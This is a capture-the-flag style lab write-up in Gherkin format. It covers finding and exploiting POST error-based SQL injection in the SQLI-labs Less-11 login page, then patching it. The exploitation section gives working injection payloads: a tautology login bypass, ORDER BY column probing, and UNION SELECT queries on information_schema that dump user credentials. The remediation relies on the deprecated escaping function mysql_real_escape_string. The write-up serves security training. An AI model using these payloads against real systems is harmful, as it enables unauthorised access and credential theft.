## Version 1.4.1
## language: en

Feature:
  TOE:
    SQLI-labs
  Category:
    SQL Injection - POST-Error Based-Single quotes-String
  Location:
    http://testasp.vulnweb.com/Login.asp
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get sensitive data by SQL injections
  Recommendation:
    Discard special characters from user input

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Ubuntu            | 16.04.6 LTS     |
    | Firefox           | 71.04           |
    | Burp Suite        | 2.1.07          |
    | Docker            | 18.06.1-ce      |
  TOE information:
    Given I am using the docker image "tuxotron/audi_sqli"
    And I start a new container
    When I examine the container technologies
    Then I see that the database is MySQL
    And The server is Apache2
    And the web app was made with PHP

  Scenario: Normal use case
    Given the site has username and password fields
    When I try to login with a random information ("user"-"user")
    Then I get "Login Attempts Failed!" message [evidence](loginfailed.png)

  Scenario: Static detection
    Given I can access to the source code inside the container
    """
    /var/www/html/Less-11/index.php
    """
    When I review the source code
    Then I find two variables obtained by a POST from line 46 to line 47
    """
    46 $uname=$_POST['uname'];
    47 $passwd=$_POST['passwd'];
    """
    When I review the usage of these variables
    Then I find that the variables are used in a query from line 57 to line 59
    """
    57 $sql="SELECT username, password FROM users
            WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    58 $result=mysql_query($sql);
    59 $row = mysql_fetch_array($result);
    """
    When Variables requested from users are not validated
    And These variables are used directly in a SQL query
    Then The site is vulnerable to SQL injections

  Scenario: Dynamic detection
  Detecting SQL injection vulnerability
    Given I get "Login Attempts Failed!"
    When I use "user'" as password to generate an error
    Then I receive the following message
    """
    You have an error in your SQL syntax; check the manual that corresponds to
    your MySQL server version for the right syntax to use near ''user''
    LIMIT 0,1' at line 1
    """
    When I try to repair the query with a generic approach in password field
    """
    user' or '1'='1
    """
    Then I can login
    And receive the following message
    """
    Your Login name:Dumb
    Your Password:Dumb
    """
    When I can broke-repair a SQL query
    And Query information or errors is showed
    Then the site is susceptible to SQL injections

  Scenario: Exploitation
    Given I obtain user information "Dumb"-"Dumb"
    When I capture the login request with Burp Suite
    Then I can send a POST requests modifying "uname" and "passwd" fields
    And I can check the response [evidence](postrequest.png)
    Given I need to know how many columns has the query
    When I try different values in the "passwd" field to order the query
    """
    Dumb'order by 2--+
    Dumb'order by 3--+
    Dumb'order by 5--+
    """
    Then I receive a normal response for 2
    And I receive errors for 3 and 5
    Then I conclude that the query has two columns for user and password
    Given I want to visualize information in password field
    When I use a generic expression in the "passwd" field
    """
    -Dumb'union select 1,2 --+
    """
    Then I obtain the following response in Burp Suite
    """
    <br>Your Login name:1<br>Your Password:2<br
    """
    Given I can visualize information in login or password field
    When I check the user-database in the "uname" and "passwd" fields
    """
    -Dumb'union select user(),database() --
    """
    Then I receive the following response in Burp Suite
    """
    <br>Your Login name:root@localhost<br>Your Password:security<br>
    """
    Given I know the database name
    When I check the tables in the "passwd" field
    And I convert "security" to hexadecimal
    """
    -Dumb'union select 1,(select+group_concat(table_name)+from+
    information_schema.tables+where+table_schema=0x7365637572697479) --+
    """
    Then I receive the following response in Burp Suite
    """
    <br>Your Password:emails,referers,uagents,users<br>
    """
    Given I know the tables names
    And I want to know users sensitive information
    When I check the columns names in the "passwd" field
    And I convert "users" to hexadecimal
    """
    -Dumb'union select 1,(select+group_concat(column_name)+from+
    information_schema.columns+where+table_name=0x7573657273) --+
    """
    Then I receive the following response in Burp Suite
    """
    <br>Your Password:id,username,password<br
    """
    Given I know the columns names of "users" table
    When I check the users information in the "passwd" field
    And I add additional characters to improve visuability
    """
    -Dumb'union select 1,(select+group_concat(username,"=",password,"     ")+
    from+security.users) --+
    """
    Then I obtain sensitive information [evidence](sensitiveinfo.png)

  Scenario: Remediation
    Given The site is susceptible to SQL injection attacks
    When I look a solution on the web
    Then I find different solutions
    Given I am using a docker image
    And This image uses an old PHP version "PHP 5.5.9-1ubuntu4.13"
    When I search a solution for this PHP version
    Then I find "mysql_real_escape_string" in PHP documentation
    """
    https://www.php.net/manual/es/function.mysql-real-escape-string.php
    """
    When I analyze the source code to patch the vulnerability
    Then I add two lines after line 47 to ignore special characters
    """
    46 $uname=$_POST['uname'];
    47 $passwd=$_POST['passwd'];
    48 $uname=mysql_real_escape_string($uname);
    49 $passwd=mysql_real_escape_string($passwd);
    """
    When I try to login with "Dumb"-"Dumb"
    And I try to login with "Dummy"-"p@ssword"
    Then the page works without problem
    When I try to break the SQL query modifying the "passwd" field with "Dumb'"
    Then The site ignores special characters returning "Login Attempts Failed!"
    And The site assumes "Dumb'" as password
    Then The vulnerability is patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    7.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.2/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2020-01-15
